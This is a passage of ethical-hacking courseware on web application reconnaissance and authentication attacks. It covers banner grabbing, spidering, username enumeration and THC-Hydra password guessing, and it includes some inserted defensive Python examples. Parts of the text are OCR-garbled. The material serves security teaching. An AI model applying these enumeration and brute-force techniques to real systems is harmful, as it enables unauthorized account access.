Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header field to identify the make, model, and version of the web server software. This information helps attackers to select exploits from vulnerability databases to attack a web server and its applications. For example:

C:\>telnet www.juggyboy.com 80
HEAD / HTTP/1.0

A banner can be grabbed with the help of tools such as Telnet, Netcat, ID Serve, and Netcraft.

These tools make banner grabbing and analysis an easy task.


HTTP/1.1 200 OK
Server: (value identifies the server as Microsoft IIS)
Date: Thu, 07 Jul 2005 13:08:16 GMT
Content-Length: 1270
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQTCQBQ=PBLPKEKBNDGK0FFIP0LHPLNE; path=/
Via: 1.1 Application and Content Networking System Software 5.1.15
Connection: Close

Connection to host lost.

C:\>

FIGURE 13.33: Server Identification/Banner Grabbing


Footprint Web Infrastructure: Hidden Content Discovery



Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application

It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.

Web Spidering: Web spiders automatically discover the hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Web Spidering Tools: OWASP Zed Attack Proxy, Burp Spider, WebScarab

Attacker-Directed Spidering: The attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. Tool: OWASP Zed Attack Proxy

Brute Forcing: Use automation tools such as Burp Suite to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.

Footprint Web Infrastructure: Hidden Content Discovery


Crucial business information such as prices of products, discounts, login IDs, and passwords is kept secret and is usually not visible to outsiders; it is often stored in hidden form fields. Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc. This hidden content can be discovered with the help of three techniques. They are:

Web Spidering
Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover the hidden content by means of web spidering include: OWASP Zed Attack Proxy, Burp Spider, WebScarab


Attacker-Directed Spidering

An attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy, can also be used for attacker-directed spidering.

Brute Forcing
Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.


Web Spidering Using Burp Suite


1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions
5. Continue these steps recursively until no further content or functionality is identified


Web Spidering Using Burp Suite


Source: http://www.portswigger.net
Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. Web spidering using Burp Suite is done in the following manner:

1. Configure your web browser to use Burp as a local proxy

2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available

3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled

4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions

5. Continue these steps recursively until no further content or functionality is identified


[Screenshot: Burp Suite free edition v1.4.01, Intruder tab. A captured GET request to ts4.mm.bing.net (Chrome/22 User-Agent, Referer from a bing.com image search) is shown with two payload positions marked and attack type "sniper"; the "intruder attack 1" results window lists the baseline request and the "Web Service Attack" payloads with their status codes (200, 400) and response lengths, showing all items and the attack finished.]

FIGURE 13.34: Web Spidering Using Burp Suite


Web Spidering Using Mozenda Web Agent Builder


Mozenda Web Agent Builder crawls through a website and harvests pages of information.

Web Spidering Using Mozenda Web Agent Builder

Source: http://www.mozenda.com
Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.


[Screenshot: Mozenda Web Agent Builder with an unsaved agent ("WebAgent1") open on a product review page. The "New Action" panel offers Click an item, Capture text or image, Set user input, and Create a list of items; the action list shows a Begin Item List / Capture Item Name / Capture Price / Capture Rating / Capture Model / Click Item / End List sequence, a nested review list capturing Review Rating, Review, and Would recommend, and the captured review rows below.]

FIGURE 13.35: Web Spidering Using Mozenda Web Agent Builder


Attack Web Servers

Attack Authentication Mechanism

Attack Session Management Mechanism

Attack Data Connectivity

Attack Web Services


Web App Hacking Methodology: Attack Web Servers


Once you conduct full scope footprinting on web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack web servers using various techniques available. Each and every website or web application is associated with a web server that has code for serving a website or web application. The attacker exploits the vulnerabilities in the code and launches the attacks on the web server. Detailed information about hacking web servers will be explained on the following slides.


Hacking Web Servers
Once the attacker identifies the web server environment, he or she scans for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.


Web Server Hacking Tool: WebInspect


WebInspect identifies security vulnerabilities in the web applications. It runs interactive scans using a sophisticated user interface. Attackers can exploit identified vulnerabilities to carry out web services attacks.

https://download.hpsmartupdate.com

Web Server Hacking Tool: WebInspect

Source: https://download.hpsmartupdate.com
WebInspect is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.


[Screenshot: WebInspect scan results window.]

FIGURE 13.36: WebInspect Tool Screenshot


Attack Web Servers

Attack Authentication Mechanism

Attack Session Management Mechanism

Attack Data Connectivity

Attack Web Services


Web App Hacking Methodology: Analyze Web Applications


Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points to break into the web application will be discussed on the following slides.


Analyze Web Applications

Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input: Review the generated HTTP request to identify the input entry points.

Identify Server-Side Functionality: Observe the applications revealed to the client to identify the server-side structure and functionality.

Identify Server-Side Technologies: Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.

Map the Attack Surface: Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.

Analyze Web Applications

Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge about the web application and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input
The entry points of an application serve as entry points for attacks; these include the front-end web application that listens for HTTP requests. Review the generated HTTP request to identify the user input entry points.

Identify Server-Side Functionality
Server-side functionality refers to the ability of a server to execute programs that produce the output web pages. These are scripts that reside on particular web servers and allow interactive web pages or websites to run there. Observe the applications revealed to the client to identify the server-side structure and functionality.

Identify Server-Side Technologies
Server-side technologies, or server-side scripting, refers to the dynamic generation of web pages by the web server, as opposed to static web pages that are stored on the server and served to web browsers unchanged. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.

Map the Attack Surface
Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.


Analyze Web Applications: Identify Entry Points for User Input


Examine URL, HTTP Header, query string parameters, POST data, and cookies to determine all user input fields

Identify HTTP header parameters that can be processed by the application as user inputs such as User-Agent, Referer, Accept, Accept-Language, and Host headers

Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL

Tools used: Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy

Analyze Web Applications: Identify Entry Points for User Input

During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles user input. The attacker then tries to find the vulnerabilities present in the input mechanism and tries to exploit them so that he or she can interact with or gain access to the web application.

1. Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.

2. Identify HTTP header parameters that can be processed by the application as user inputs, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.

3. Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy, etc.
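One way to inventory those entry points from a captured request, as an added example that is not part of the module: every path, query parameter, user-controlled header, cookie and body field is collected so the list can feed input validation and threat modelling. The request is constructed; the host name reuses the module's own juggyboy.com example.

```python
"""Inventory the user-controlled entry points in a captured HTTP request."""
from urllib.parse import parse_qsl, urlsplit

# Headers the module names as ones an application may process as user input.
USER_INPUT_HEADERS = {"user-agent", "referer", "accept", "accept-language", "host"}


def parse_request(raw: str) -> tuple[str, str, dict, str]:
    """Split a raw HTTP/1.1 request into method, request-target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def find_entry_points(raw: str) -> list[tuple[str, str, str]]:
    """Return (source, name, value) for every attacker-controlled input in the request."""
    _method, target, headers, body = parse_request(raw)
    points = []
    parts = urlsplit(target)
    points.append(("path", "path", parts.path))                       # the URL path itself
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        points.append(("query", name, value))                         # query string parameters
    for name, value in headers.items():
        if name in USER_INPUT_HEADERS:
            points.append(("header", name, value))                    # headers apps often echo or log
    for pair in headers.get("cookie", "").split(";"):
        if pair.strip():
            name, _, value = pair.strip().partition("=")
            points.append(("cookie", name, value))                    # cookies, session ids included
    ctype = headers.get("content-type", "")
    if body and ctype.startswith("application/x-www-form-urlencoded"):
        for name, value in parse_qsl(body, keep_blank_values=True):
            points.append(("body", name, value))                      # POST form fields
    elif body:
        points.append(("body", "raw", body))                          # any other body is one opaque input
    return points


# Constructed sample request (not a real capture).
SAMPLE_REQUEST = (
    "POST /customers.aspx?name=existing%20clients&showBy=name HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://www.juggyboy.com/index.aspx\r\n"
    "Accept-Language: en-US,en;q=0.8\r\n"
    "Cookie: ASP.NET_SessionId=abc123; theme=dark\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 31\r\n"
    "\r\n"
    "isActive=0&startDate=20/11/2010"
)

if __name__ == "__main__":
    for source, name, value in find_entry_points(SAMPLE_REQUEST):
        print(f"{source:7} {name:20} {value}")
```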


Analyze Web Applications: Identify Server-Side Technologies

Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies

Examine URLs for file extensions, directories, and other identification information

Examine the error page messages

Examine session tokens: JSESSIONID - Java; ASPSESSIONID - IIS server; ASP.NET_SessionId - ASP.NET; PHPSESSID - PHP

[Slide figure: an error page at http://juggyboy.com/error.aspx reading "Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code. Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1", shown beside server banners such as Microsoft-IIS/6.0, Apache/2.0.52 (Fedora), SunONE WebServer 6.0 and Netscape-Enterprise/4.1, labelled "Server Side Technologies".]

Analyze Web Applications: Identify Server-Side Technologies

Source: http://net-square.com
After identifying the entry points through user inputs, attackers try to identify server-side technologies. The server-side technologies can be identified as follows:

1. Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies

2. Examine URLs for file extensions, directories, and other identification information

3. Examine the error page messages

4. Examine session tokens:
   JSESSIONID - Java
   ASPSESSIONID - IIS server
   ASP.NET_SessionId - ASP.NET
   PHPSESSID - PHP


[Figure: a web server fingerprinting report listing, per host and port, the banner reported versus the banner deduced (banners include Microsoft-IIS/6.0, Apache/2.0.52 (Fedora), Apache/2.0.x, Apache/1.3.27, SunONE WebServer 6.0, Netscape-Enterprise/4.1, Microsoft-IIS/4.0, Microsoft-IIS/5.0 ASP.NET, Microsoft-IIS/5.1, and one host answering "Yes we are using ServerMask!"), shown beside the ASP.NET error page from http://juggyboy.com/error.aspx ("Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'. ... Version Information: Microsoft .NET Framework Version 4.0.30319; ASP.NET Version 4.0.30319.1").]

FIGURE 13.37: Identify Server-Side Technologies


Analyze Web Applications: Identify Server-Side Functionality

Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications

Tools used: GNU Wget (http://www.gnu.org), Teleport Pro (http://www.tenmax.com), BlackWidow (http://softbytelabs.com)

Examine URL:
https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name
(https: SSL; .aspx: ASPX platform; showBy: database column)

Analyze Web Applications: Identify Server-side Functionality


Once the server-side technologies are determined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools Used:

Wget

Source: http://www.gnu.org

GNU Wget is for retrieving files using HTTP, HTTPS, and FTP, the most widely-used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X-Windows support, etc.

Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.

B lackW idow
____ Source: http://softbvtelabs.com BlackWidow scans a site and creates a complete profile of the site's structure, files, external links and even link errors. BlackWidow will download all file types such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, HTM to M IM E types from any websites. Download video and save as many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, W M V , ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter. Examine URL
SSL

ASPX Platform

h t t p s : / / w w w .ju g g y b o y . c o m / c u s to m e rs . a s p x ? n a m e = e x is t in g % 2 0 c lie n t s & is A c t iv e = 0 & s t a r tD a te = 2 0 % 2 F ll% 2 F 2 0 1 0 S e n d D a t e = 2 0 % 2 F 0 5 % 2 F 2 0 1 1 & s h o w B y = n a m e

-> Database Column < FIGURE 13.38: BlackWidow

If a page URL starts with https instead of http, then it is known as a SLL certified page. If a page contains an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBY, then you can assume that the application is using a database and displays the data by that value.


Analyze Web Applications: Map the Attack Surface

Information                    | Attack
Client-Side Validation         | Injection Attack, Authentication Attack
Database Interaction           | SQL Injection, Data Leakage
File Upload and Download       | Directory Traversal
Display of User-Supplied Data  | Cross-Site Scripting
Dynamic Redirects              | Redirection, Header Injection
Login                          | Username Enumeration, Password Brute-Force
Session State                  | Session Hijacking, Session Fixation

Information                    | Attack
Injection Attack               | Privilege Escalation, Access Controls
Cleartext Communication        | Data Theft, Session Hijacking
Error Message                  | Information Leakage
Email Interaction              | Email Injection
Application Codes              | Buffer Overflows
Third-Party Application        | Known Vulnerabilities Exploitation
Web Server Software            | Known Vulnerabilities Exploitation

Analyze Web Applications: M ap the Attack Surface


There are various entry points through which attackers can compromise an application and its network, so the attack surface must be analyzed properly. Mapping the attack surface means checking thoroughly for the vulnerabilities an attack could use. The following table lists the kinds of application functionality through which an attacker collects information, and the kind of attack each one invites.


Information                    | Attack
Client-Side Validation         | Injection Attack, Authentication Attack
Database Interaction           | SQL Injection, Data Leakage
File Upload and Download       | Directory Traversal
Display of User-Supplied Data  | Cross-Site Scripting
Dynamic Redirects              | Redirection, Header Injection
Login                          | Username Enumeration, Password Brute-Force
Session State                  | Session Hijacking, Session Fixation

Information                    | Attack
Injection Attack               | Privilege Escalation, Access Controls
Cleartext Communication        | Data Theft, Session Hijacking
Error Message                  | Information Leakage
Email Interaction              | Email Injection
Application Codes              | Buffer Overflows
Third-Party Application        | Known Vulnerabilities Exploitation
Web Server Software            | Known Vulnerabilities Exploitation

FIGURE 13.39: Map the Attack Surface
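The two preceding sections (inferring server-side functionality from URLs, and mapping functionality to the attack classes in the table above) can be automated over a crawl. The following Python example is added here; it is not part of the EC-Council courseware and does not belong to Wget, Teleport Pro or BlackWidow. The pages, host names and HTML are constructed, and the parameter-name heuristics (showBy, next, ...) are assumptions, not a published rule.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlparse

# Constructed sample crawl: URL -> page HTML, as a spider would return it.
# The host name is a placeholder, not a real site.
SAMPLE_PAGES = {
    "https://www.example-shop.test/customers.aspx?name=existing%20clients&showBy=name":
        '<form method="post" action="/customers.aspx"><input name="q"><input type="submit"></form>',
    "https://www.example-shop.test/login.jsp":
        '<form method="post" action="/login.jsp"><input name="user"><input type="password" name="pass"></form>',
    "https://www.example-shop.test/upload.php":
        '<form method="post" enctype="multipart/form-data"><input type="file" name="doc"></form>',
    "http://www.example-shop.test/redirect.php?next=http%3A%2F%2Fhome.test":
        '<p>Redirecting...</p>',
    "https://www.example-shop.test/contact.jsp":
        '<form method="post"><input type="email" name="to"><textarea name="msg"></textarea></form>',
}

# Assumed heuristics: file extension -> platform, parameter names that hint at a
# database-driven view, and parameter names that hint at a dynamic redirect.
PLATFORM_HINTS = {".aspx": "ASP.NET", ".asp": "Classic ASP", ".php": "PHP", ".jsp": "Java (JSP)"}
DB_PARAM_HINTS = {"showby", "sort", "order", "id", "query"}
REDIRECT_PARAM_HINTS = {"next", "url", "redirect", "return", "goto"}


class FormScanner(HTMLParser):
    """Collects the input types used by the forms on a page."""

    def __init__(self):
        super().__init__()
        self.input_types = set()
        self.multipart = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input":
            self.input_types.add((a.get("type") or "text").lower())
        elif tag == "textarea":
            self.input_types.add("textarea")
        elif tag == "form" and "multipart/form-data" in (a.get("enctype") or "").lower():
            self.multipart = True


def analyze_page(url, html):
    """Return (platform hints, attack-surface entries) for one crawled page.
    Each entry is an (Information, Attack) pair from the table above."""
    parsed = urlparse(url)
    params = {k.lower() for k in parse_qs(parsed.query)}
    ext = re.search(r"(\.[a-z0-9]+)$", parsed.path.lower())
    hints, surface = [], set()

    hints.append("TLS" if parsed.scheme == "https" else "cleartext HTTP")
    if parsed.scheme != "https":
        surface.add(("Cleartext Communication", "Data Theft, Session Hijacking"))
    if ext and ext.group(1) in PLATFORM_HINTS:
        hints.append(PLATFORM_HINTS[ext.group(1)])
    if params & DB_PARAM_HINTS:
        surface.add(("Database Interaction", "SQL Injection, Data Leakage"))
    if params & REDIRECT_PARAM_HINTS:
        surface.add(("Dynamic Redirects", "Redirection, Header Injection"))

    scanner = FormScanner()
    scanner.feed(html)
    if "password" in scanner.input_types:
        surface.add(("Login", "Username Enumeration, Password Brute-Force"))
    if "file" in scanner.input_types or scanner.multipart:
        surface.add(("File Upload and Download", "Directory Traversal"))
    if "email" in scanner.input_types:
        surface.add(("Email Interaction", "Email Injection"))
    if scanner.input_types & {"text", "search", "textarea"}:
        surface.add(("Display of User-Supplied Data", "Cross-Site Scripting"))
    return hints, surface


def map_attack_surface(pages):
    """Run analyze_page over a whole crawl: URL -> (hints, surface)."""
    return {url: analyze_page(url, html) for url, html in pages.items()}


if __name__ == "__main__":
    for url, (hints, surface) in map_attack_surface(SAMPLE_PAGES).items():
        print(url, "->", ", ".join(hints))
        for info, attack in sorted(surface):
            print("   ", info, "=>", attack)
```

The output is an inventory, not a finding: each entry says which test class the page's functionality calls for, which is exactly what a tester (or the defending team reviewing its own site) needs before choosing tools.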


Attack W eb Servers

Attack Authentication Mechanism

Attack Session Management Mechanism

Attack Data Connectivity

Attack Web Services


Web App Hacking Methodology


In web applications, the authentication functionality has many design loopholes, such as bad passwords (short or blank, common dictionary words or names, passwords set the same as the user name, and passwords still set to default values). The attacker can exploit the vulnerabilities in the authentication mechanism to gain access to the web application or network. Threats that exploit weaknesses in the authentication mechanism include network eavesdropping, brute force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.


Attack Authentication Mechanism


Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit them and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. Web applications usually authenticate their clients or users based on a combination of user name and password. Hence, an attack on the authentication mechanism involves identifying and exploiting user names and passwords.

User Name Enumeration


User names can be enumerated in two ways; one is verbose failure messages and the other is predictable user names.

Verbose Failure Message


In a typical login system, the user is required to enter two pieces of information: a user name and a password. In some cases, an application will ask for more. If the user tries to log in and fails, it can be inferred that at least one of the pieces of information provided is incorrect or inconsistent with the others. If the application discloses which particular piece of information was incorrect or inconsistent, it gives an attacker the ground to exploit the application.


Example:
Account <username> not found
The password provided is incorrect
Account <username> has been locked out

Predictable User Names

Some applications automatically generate account user names according to a predictable sequence. This makes it very easy for an attacker who discerns the sequence to build a potentially exhaustive list of all valid user names.

Password Attacks

Passwords are cracked based on:
Password functionality exploits
Password guessing
Brute-force attacks

Session Attacks

The following are the types of session attacks employed by the attacker to attack the authentication mechanism:
Session prediction
Session brute-forcing
Session poisoning

Cookie Exploitation

The following are the types of cookie exploitation attacks:
Cookie poisoning
Cookie sniffing
Cookie replay


User Name Enumeration

If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts

User Name Enumeration


Source: https://wordpress.com User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password are not correct, guess the users of the application using the trial-and-error method. Look at the following picture that shows enumerating user names from verbose failure messages:


[Figure residue: two WordPress.com login screenshots. Left: the user name rini.matthews is entered and the response is "ERROR: Invalid email or username". Right: the user name rinimatthews is entered and the response is "ERROR: The password you entered for the email or username rinimatthews is incorrect". Both forms show Email or Username and Password fields, Remember Me, Log In, Register, Lost your password? and Back to WordPress.com links.]

Username rini.matthews does not exist

Username successfully enumerated to rinimatthews

FIGURE 13.40: User Name Enumeration

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts. Some applications automatically generate account user names based on a sequence (such as user101, user102, etc.), and attackers can determine the sequence and enumerate valid user names.
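The verbose failure messages described under "Verbose Failure Message" and shown in Figure 13.40 can be reproduced and checked in code. The following Python example is added here and is not part of the EC-Council courseware or of WordPress: it puts the leaky login beside a hardened one that returns a single message and does the same amount of work on every path, and it includes the self-test a defender runs to confirm that the messages no longer distinguish existing names. The user store, salt and passwords are constructed; the two names come from the figure.

```python
import hashlib
import hmac
import secrets

# Constructed user store. The salt is fixed only so the example is deterministic;
# a real store uses a random salt per user.
_SALT = b"constructed-fixed-salt"
_ITERATIONS = 50_000


def _hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, _ITERATIONS)


USERS = {"rinimatthews": _hash("correct horse battery")}   # constructed password
_DUMMY_HASH = _hash("dummy")   # so an unknown user costs the same as a known one


def login_verbose(username, password):
    """Vulnerable form: the failure message reveals which piece was wrong,
    which is exactly what Figure 13.40 exploits."""
    if username not in USERS:
        return False, f"Username {username} does not exist"
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return False, "The password you entered is incorrect"
    return True, "Login successful"


def login_uniform(username, password):
    """Hardened form: one failure message, and the password hash is always
    computed, so neither the text nor the response time separates the cases."""
    stored = USERS.get(username, _DUMMY_HASH)
    ok = hmac.compare_digest(stored, _hash(password)) and username in USERS
    return ok, ("Login successful" if ok else "Invalid email, username, or password")


def enumerable_users(login_fn, candidates, probe_password="not-the-password"):
    """Defender's self-test: which candidate names does the failure message confirm?
    A name is leaked when its failure message differs from the one returned for
    a name that certainly does not exist (a random canary)."""
    canary = "canary-" + secrets.token_hex(4)

    def normalized(name):
        _ok, msg = login_fn(name, probe_password)
        return msg.replace(name, "<name>")   # ignore the echoed name itself

    baseline = normalized(canary)
    return [u for u in candidates if normalized(u) != baseline]


if __name__ == "__main__":
    names = ["rini.matthews", "rinimatthews"]
    print("verbose login leaks:", enumerable_users(login_verbose, names))
    print("uniform login leaks:", enumerable_users(login_uniform, names))
```

The account lockout mentioned in the note is a separate control; the uniform message closes the information leak even where lockout is not in place.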


Password Attacks: Password Functionality Exploits

Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for 'Old Password', 'New Password', and 'Confirm the New Password' fields and analyze errors to identify vulnerabilities in password change functionality

'Forgot Password' features generally present a challenge to the user; if the number of attempts is not limited, an attacker can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or existing password to an email address specified by the attacker if the challenge is solved

"Remember Me" functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010. Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms

Password Attacks: Password Functionality Exploits


Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.

Password Changing

Determine password change functionality within the application by spidering the application or creating a login account. Try random strings for the Old Password, New Password, and Confirm the New Password fields and analyze errors to identify vulnerabilities in password change functionality.

Password Recovery

Forgot Password features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or the existing password to an email address specified by the attacker if the challenge is solved.

Remember Me Exploit

Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.


Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.


Password Attacks: Password Guessing

Password List
Attackers create a list of possible passwords using the most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered

Password Dictionary
Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks

Tools
Password guessing can be performed manually or using automated tools such as Brutus, THC-Hydra, etc.

[Figure residue: THC-Hydra (HydraGTK) screenshot. Recoverable content: Target, Passwords, Tuning, Specific and Start tabs; a Username field and a Password List field (/tmp/passlist.txt); "Try login as password" and "Try empty password" options; the generated command line hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns; an output pane reporting 45380 login tries against the ftp service on port 21 and a found login for user marc.]

Password Attacks: Password Guessing


Password guessing is a method where an attacker guesses various passwords until he or she gets the correct password, using the following methods: a password list, a password dictionary, and various tools.

Password List

Attackers create a list of possible passwords using the most commonly used passwords, footprinting the target and social engineering techniques, and try each password until the correct password is discovered.

Password Dictionary

Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing

Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Insider, THC-Hydra, etc.

THC-Hydra

Source: http://www.thc.org


THC-Hydra is a network logon cracker that supports many different services. This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

[Figure residue: HydraGTK screenshot. Recoverable content: Target, Passwords, Tuning, Specific and Start tabs; Username testuser with Password List /tmp/passlist.txt; "Try login as password" and "Try empty password" options; Start, Stop, Save Output and Clear Output buttons; generated command lines:
hydra 127.0.0.1 ftp -l testuser -P /tmp/passlist.txt -e ns
hydra 127.0.0.1 ftp -l marc -P /tmp/passlist.txt -e ns -t 32
Output pane: Hydra v4.1 (c) 2004 by van Hauser / THC, starting at 2004-05-17 21:58:52; 32 tasks, 1 server, 45380 login tries (l:1/p:45380), ~1418 tries per task; attacking service ftp on port 21; status lines at roughly 14000 tries/min; result "[21][ftp] host: 127.0.0.1 login: marc password: success"; finished at 2004-05-17 22:01:38.]

FIGURE 13.41: THC-Hydra Tool Screenshot

In addition to these tools, Burp Insider is also used for password guessing.
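The Hydra output in Figure 13.41 is the attacker's view: roughly 14000 tries per minute against one account. The server-side view of the same activity is a burst of failed logins from one source, which is what a detection rule keys on. The following Python example is added here and is not part of the EC-Council courseware or of THC-Hydra; it runs a sliding-window failure count over constructed application login audit lines (the log format, addresses and user names are made up for the example) and flags a burst that is followed by a success, the pattern a successful guessing run leaves behind.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of login audit lines (not from any real system). The burst
# against user "marc" is the shape a guessing tool produces; "alice" is one
# ordinary typo followed by a later successful login.
SAMPLE_LOG = """\
2024-05-17 21:58:52 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:53 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:53 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:54 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:55 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:56 src=198.51.100.7 user=marc result=FAIL
2024-05-17 21:58:57 src=198.51.100.7 user=marc result=SUCCESS
2024-05-17 21:59:10 src=203.0.113.9 user=alice result=FAIL
2024-05-17 22:05:40 src=203.0.113.9 user=alice result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) "
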